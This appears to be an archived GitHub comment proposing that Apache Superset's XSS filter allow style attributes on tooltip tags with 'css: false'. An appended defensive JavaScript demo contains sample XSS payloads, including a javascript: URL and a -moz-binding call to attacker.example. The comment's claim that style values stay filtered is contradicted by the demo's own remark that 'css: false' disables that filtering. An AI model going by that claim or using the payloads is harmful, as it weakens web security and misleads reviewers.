CoDeRror555 commented on issue #33865:
URL: https://github.com/apache/superset/issues/33865#issuecomment-3016441287
I've looked into this issue and it seems the root cause is indeed the
stricter frontend XSS filter introduced in
superset-frontend/src/utils/sanitize.ts. It's correctly stripping inline style
attributes from the HTML in tooltips, which removes the custom formatting.
As a solution, I propose updating the whiteList in the FilterXSS
configuration to explicitly allow the style attribute on tags commonly used for
tooltip formatting, such as div, span, and table elements.
Here is the proposed change in superset-frontend/src/utils/sanitize.ts:
const xssFilter = new FilterXSS({
  whiteList: {
    ...getDefaultWhiteList(),
    span: ['style', 'class', 'title'],
    div: ['style', 'class'],
    a: ['style', 'class', 'href', 'title', 'target'],
    img: ['style', 'class', 'src', 'alt', 'title', 'width', 'height'],
    video: [
      'autoplay',
      'controls',
      'loop',
      'preload',
      'src',
      'height',
      'width',
      'muted',
    ],
    // Add 'style' to table tags to allow inline styling
    td: ['style'],
    tr: ['style'],
    th: ['style'],
    table: ['style'],
  },
  stripIgnoreTag: true,
  css: false,
});
This change will restore the expected functionality for custom tooltips.
From a security perspective, this is a reasonable trade-off because the xss
library itself still sanitizes the content of the style attribute, preventing
dangerous CSS properties (like url(javascript:...)) and preserving the core XSS
protection.
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: [email protected]
For queries about this service, please contact Infrastructure at:
[email protected]
---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]
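Added example, not part of the comment above, of Superset, or of the xss library: a stand-alone model of what it means to let a style attribute through on tooltip tags. In the xss library the `css` option is what switches the CSS filter on the style value on or off (`css: false` disables it), so the point a reviewer of the proposed config wants settled is what survives in the attribute once no per-property filtering runs. The block below contrasts a pass-through mode (the attribute kept as written, only quotes escaped) with a whitelist mode that keeps only known-safe properties and drops values containing script schemes, expression() or url(). The allowed-property list, the sample fragments and the attribute regex are assumptions made for this example; the real library's behaviour under `css: false` should be checked with a unit test against the library itself.

```javascript
// Illustrative style-attribute sanitizer (example code, not js-xss).
// Assumed allow-list of properties a tooltip legitimately needs.
const ALLOWED_CSS_PROPERTIES = new Set([
  'color', 'background-color', 'font-weight', 'font-size', 'font-family',
  'text-align', 'padding', 'margin', 'border', 'width', 'height',
]);

// Value patterns that must never survive inside a style attribute.
const SCRIPT_SCHEME = /(java|vb|live)script\s*:|mocha\s*:/i;
const CSS_EXPRESSION = /expression\s*\(/i; // legacy IE dynamic properties
const ANY_URL = /url\s*\(/i;               // external fetch / XBL binding

// Split "a: b; c: d" into [{prop, value}], tolerant of stray semicolons.
function splitDeclarations(style) {
  return style.split(';').map(s => s.trim()).filter(Boolean).map(decl => {
    const i = decl.indexOf(':');
    if (i < 0) return { prop: decl.toLowerCase(), value: '' };
    return {
      prop: decl.slice(0, i).trim().toLowerCase(),
      value: decl.slice(i + 1).trim(),
    };
  });
}

function isDangerousValue(value) {
  return SCRIPT_SCHEME.test(value) || CSS_EXPRESSION.test(value) || ANY_URL.test(value);
}

// mode 'passthrough': the declarations are kept verbatim; only quotes are
//   escaped so the attribute itself cannot be broken out of.
// mode 'whitelist': only allowed properties with safe values are kept.
function sanitizeStyle(style, mode) {
  if (mode === 'passthrough') {
    return style.replace(/"/g, '&quot;');
  }
  const kept = [];
  for (const { prop, value } of splitDeclarations(style)) {
    if (!ALLOWED_CSS_PROPERTIES.has(prop)) continue; // unknown property: drop
    if (isDangerousValue(value)) continue;           // hostile value: drop
    kept.push(`${prop}:${value}`);
  }
  return kept.join(';').replace(/"/g, '&quot;');
}

// Rewrite every style="..." attribute in a fragment with the chosen mode.
// A regex over attributes is enough for this demonstration; a real
// sanitizer tokenizes the HTML, which is what the xss library does.
function sanitizeStyleAttributes(html, mode) {
  return html.replace(/\s*style\s*=\s*"([^"]*)"/gi, (_m, style) => {
    const clean = sanitizeStyle(style, mode);
    return clean ? ` style="${clean}"` : ''; // empty result: drop attribute
  });
}

// Constructed tooltip fragments: one legitimate, three hostile.
const SAMPLES = {
  legit: '<div style="color: #c00; font-weight: bold">High</div>',
  jsUrl: '<span style="background: url(javascript:alert(1))">x</span>',
  binding: '<td style="-moz-binding: url(http://attacker.example/x.xml#p)">x</td>',
  overlay: '<div style="position: fixed; top: 0; left: 0; width: 100vw; height: 100vh">x</div>',
};

// Run all samples through one mode and return the results by name.
function demo(mode) {
  const out = {};
  for (const [name, html] of Object.entries(SAMPLES)) {
    out[name] = sanitizeStyleAttributes(html, mode);
  }
  return out;
}

for (const mode of ['passthrough', 'whitelist']) {
  console.log(`== ${mode} ==`);
  for (const [name, html] of Object.entries(demo(mode))) {
    console.log(`${name}: ${html}`);
  }
}
```

In pass-through mode every hostile fragment comes back unchanged, including the full-viewport overlay, which needs no script at all to be abusive. In whitelist mode the legitimate colour and weight survive while the script URL, the binding and the positioning are dropped; that property-level decision is the part of the work that has to live somewhere once style is allowed on div, span and table tags.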